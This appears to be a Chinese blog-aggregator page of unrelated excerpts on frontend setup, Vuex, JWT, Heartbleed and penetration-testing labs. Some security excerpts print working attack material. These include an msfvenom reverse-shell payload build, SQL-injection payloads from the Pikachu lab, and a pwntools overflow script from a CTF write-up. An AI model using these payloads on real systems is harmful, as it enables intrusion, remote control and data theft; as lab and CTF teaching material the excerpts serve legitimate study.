payload

dva+umi+antd项目从搭建到使用(没有剖验证,不知道在说i什么)

喜夏-厌秋 提交于 2019-11-29 20:14:09
先创建一个新项目,具体步骤请参考 https://www.cnblogs.com/darkbluelove/p/11338309.html 一.添加document.ejs文件(参考文档: https://umijs.org/zh/guide/app-structure.html#src-pages-document-ejs ) 在pages文件夹下创建document.ejs文件,有这个文件时,会覆盖默认的 HTML 模板。 模板里需至少包含根节点的 HTML 信息 <div id="root"></div> 二.删除umirc.js文件(参考文档: https://umijs.org/zh/config/ ) config/config.js 和 .umirc.js只能存在一个.所以我们删除.umirc.js文件,使用自己配置的config.js 在根目录创建config/config.js config.js文件的具体配置可以查阅官方文档 config.js里面设置路由: 默认情况下,pages文件目录就是路由。配置的话需要在config.js里面,如下:(注意:component 是相对于 src/pages 目录的) export default { outputPath:'./content', treeShaking: true, ... history: 'hash

SSL,TLS协议与OpenSSL "心血"heartbleed漏洞之伤

老子叫甜甜 提交于 2019-11-29 17:17:34
一声惊雷,今天爆出了一个关于SSL协议的惊天大漏洞,在用完各种poc工具后,我们不妨来深入了解下这个高危漏洞的机理。 不管你是用网上公布的检测网站还是各个QQ群疯传的poc 脚本,知其然还要知其所以然,让我们知道漏洞形成的条件,以及漏洞产生的原理,如何修复这个惊天大漏洞。 这一次,腾讯的个别站点也没有幸免,果断是坑爹啊。点评ssl服务没有开启TLS heartbeat扩展,所以避过一劫,当然任何时候都不能说我们可以高枕无忧了,时刻得关注各种漏洞的发布与修复。 首先我们看一下某个有问题站点的SSL信息,当我们用openssl 以客户端模式连接对应网站的443端口的时候,会获取到对应服务器ssl协议中与TLS扩展相关的信息。 [root @king tests]# /usr/bin/openssl s_client -connect mail.xxx.com:443 -tlsextdebug 2>&1| grep 'TLS' TLS server extension "renegotiation info" (id=65281), len=1 TLS server extension "session ticket" (id=35), len=0 TLS server extension "heartbeat" (id=15), len=1 我们看到该站点开启了 heartbeat

ms15-051提权

笑着哭i 提交于 2019-11-29 15:01:55
ms15-051提权 实验概述   Metasploit是一款开源的渗透测试工具,可以帮助安全员发现漏洞问题,此工具带有的攻击模块可以帮助安全员简单的利用相关的漏洞,本实验通过Metasploit对内网机器进行渗透,并且使用ms15-051进行权限提升获取window server 2003的system权限,最后进行远程控制。 实验目的   1、熟练metasploit的使用方法   2、学会msfvenom命令的基本格式   3、了解ms15-051漏洞 实验原理   Metasploit框架使Metasploit具有良好的可扩展性,它的控制接口负责发现漏洞、攻击漏洞,提交漏洞,然后通过一些接口加入攻击后处理工具和报表工具。Metasploit框架可以从一个漏洞扫描程序导入数据,使用关于有漏洞主机的详细信息来发现可攻击漏洞,然后使用有效载荷对系统发起攻击。所有这些操作都可以通过Metasploit的Web界面进行管理,而它只是其中一种种管理接口,另外还有命令行工具和一些商业工具等等。攻击者可以将来漏洞扫描程序的结果导入到Metasploit框架的开源安全工具Armitage中,然后通过Metasploit的模块来确定漏洞。一旦发现了漏洞,攻击者就可以采取一种可行方法攻击系统,通过Shell或启动Metasploit的meterpreter来控制这个系统

cobalt strike笔记-CS与MSF,Armitage,Empire互转shell

烈酒焚心 提交于 2019-11-29 14:42:14
0x01 Metasploit派生shell给Cobaltstrike 生成木马: msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.5.4 LPORT=4444 -f exe > test.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload Found 1 compatible encoders Attempting to encode payload with 5 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 368 (iteration=0) x86/shikata_ga_nai succeeded with size 395 (iteration=1) x86/shikata_ga_nai succeeded with size 422 (iteration=2) x86/shikata_ga_nai

Vuex框架原理与源码分析

混江龙づ霸主 提交于 2019-11-29 13:54:53
本文授权转自微信公众号“美团点评技术团队”。 作者简介: 明裔,美团外卖高级前端研发工程师,2014年加入美团外卖,负责Web主站开发。先后参与了外卖B端、C端、配送等全业务线系统开发后,目前主要负责商家券活动系统。 责编: 陈秋歌,关注前端开发等领域,寻求报道或投稿请发邮件至chenqg#csdn.net,或加微信:Rachel_qg。 Vuex是一个专为Vue服务,用于管理页面数据状态、提供统一数据操作的生态系统。它集中于MVC模式中的Model层,规定所有的数据操作必须通过 action - mutation - state change 的流程来进行,再结合Vue的数据视图双向绑定特性来实现页面的展示更新。统一的页面状态管理以及操作处理,可以让复杂的组件交互变得简单清晰,同时可在调试模式下进行时光机般的倒退前进操作,查看数据改变过程,使code debug更加方便。 最近在开发的项目中用到了Vuex来管理整体页面状态,遇到了很多问题。决定研究下源码,在答疑解惑之外,能深入学习其实现原理。 先将问题抛出来,使学习和研究更有针对性: 使用Vuex只需执行 Vue.use(Vuex) ,并在Vue的配置中传入一个store对象的示例,store是如何实现注入的? state内部是如何实现支持模块配置和模块嵌套的? 在执行dispatch触发action(commit同理)的时候

pikachu靶场之SQL注入

为君一笑 提交于 2019-11-29 11:54:44
0x00 前言 手工注入忘的差不多了。。。还是需要多多练习 以下关卡都是稍微测以下存不存在sql注入,查下数据库名啥的 没有将所有字段都爆出来。 冲鸭~ 0x01 数字型注入(post) 因为是数字型,直接在后面加上真命题,不需要加单引号测试 0x02 字符型注入(get) 加单引号报错,说明存在sql注入 再加上真命题查询到all 0x03 搜索型注入 加单引号,sql语句报错 Payload: li’ or 1=1 --+ 加上真命题回显all Payload: li' and length(database())=7 --+ 测得数据库长度为7时正常回显 说明数据库长度为7 测数据库名 and ascii(substr(database(),x,1))=n X:库名第几位(1-7) N:该位对应的ascii码值 对n进行爆破(65-122) 最后得到数据库名:pikachu 0x04 xx型注入 加单引号 0x05 insert/update注入 1.insert注入 测试模块:注册处 令用户名为quan’ Payload: quan' or updatexml(1,concat(0x7e,database()),0) or' 2.Update注入 先登录进去,然后在修改资料处填写信息抓包 Payload: quan' or updatexml(1,concat(0x7e

XCTF - pwn when_did_you_born - WP

。_饼干妹妹 提交于 2019-11-29 10:27:08
1.先拉进虚拟机运行一下 2.检查一下文件格式,发现是64位文件,然后这个文件开了 canary 和 Nx 保护,但是影响不大。 3.用 ida64 反编译查看一下,进入main函数。不难发现,当进入 else 分支后使得 v6 得 1926 即可得到 flag。 4.现在的问题是将第一次 v6 不得 1926 而第二次检查 v6 时却是 1926 。我们注意上面定义变量时,v5 的地址为 20h,v6 为 18h。因此我们可以构造 exp 来使用第二次输入来将 v6 覆盖为 1926。而其中两个变量的差值为 8.因此 payload 就能构造了。 5. #!/usr/bin/env python from pwn import * # v5 - 20h # v6 - 18h #result = 1926 payload = 'aaaaaaaa' + str(p64(1926)) r = remote("111.198.29.45", 57262) r.recvuntil("Birth?") r.sendline("2000") r.recvuntil("Name?") r.sendline(payload) r.interactive() 6.运行脚本后得到 flag 来源: https://www.cnblogs.com/Tsuiyields/p/11515377.html

JWT签发token

坚强是说给别人听的谎言 提交于 2019-11-29 10:07:11
目录 一. 认证的发展历程简介 二. JWT签发Token源码分析 2.1 JWT工作原理及简介 2.2 JWT生成token源码分析 返回目录 一. 认证的发展历程简介   这里真的很简单的提一下认证的发展历程。以前大都是采用cookie、session的形式来进行客户端的认证,带来的结果就是在数据库上大量存储session导致数据库压力增大,大致流程如下:   在该场景下,分布式、集群、缓存数据库应运而生,认证的过程大致如下:   不过该方式还是缓解不了数据库压力,一个项目中应该尽可能多的减少IO操作,于是后来采用签名的方式,在服务端只保存token的签名算法,当客户端认证时,只需用算法去生成或是判断token的合法性即可。大致方式如下: 返回目录 二. JWT签发Token源码分析 返回目录 2.1 JWT工作原理及简介    Json web token (JWT), 是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准((RFC 7519)。该token被设计为紧凑且安全的,特别适用于分布式站点的单点登录(SSO)场景。JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源,也可以增加一些额外的其它业务逻辑所必须的声明信息,该token也可直接被用于认证,也可被加密。   JWT由三部分组成,分别是头.载荷.签名

JWT校验流程源码

让人想犯罪 __ 提交于 2019-11-29 10:07:06
目录 一. jwt token校验源码简析 1.1 前言 1.2 jwt的authenticate方法 二. jwt的RefreshJSONWebToken 返回目录 一. jwt token校验源码简析 返回目录 1.1 前言   之前使用jwt签发了token,里面的头部包含了加密的方式、是否有签名等,而载荷中包含用户名、用户主键、过期时间等信息,最后的签名还使用了摘要算法进行不可逆的加密。   同时检验签名时还需进行签名的碰撞检测,判断该token是否合法。jwt提供了一个校验token的认证方法,使用时只需要CBV中进行局部身份验证配置即可。使用如下: from rest_framework_jwt.authentication import JSONWebTokenAuthentication class 类名(JSONWebTokenAuthentication): authentication_classes = [JSONWebTokenAuthentication]   不过自身的校验还存在一些缺陷,不能完全满足的需求,这时候我们可以继承该类后重写其中校验token的方法,具体是什么方法,我们接着往下看。 返回目录 1.2 jwt的authenticate方法   以前走过APIView的源码,从源码得知身份校验走的是类中的authenticate的方法

【.Net Core】应用JWT进行用户认证及Token的刷新

旧时模样 提交于 2019-11-29 06:36:40
一、什么是JWT? JWT(json web token)基于开放标准(RFC 7519),是一种无状态的分布式的身份验证方式,主要用于在网络应用环境间安全地传递声明。它是基于JSON的,所以它也像json一样可以在.Net、JAVA、JavaScript,、PHP等多种语言使用。 为什么要使用JWT? 传统的Web应用一般采用Cookies+Session来进行认证。但对于目前越来越多的App、小程序等应用来说,它们对应的服务端一般都是RestFul 类型的无状态的API,再采用这样的的认证方式就不是很方便了。而JWT这种无状态的分布式的身份验证方式恰好符合这样的需求。 二、JWT的组成: JWT是什么样子的呢?它就是下面这样的一段字符串: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9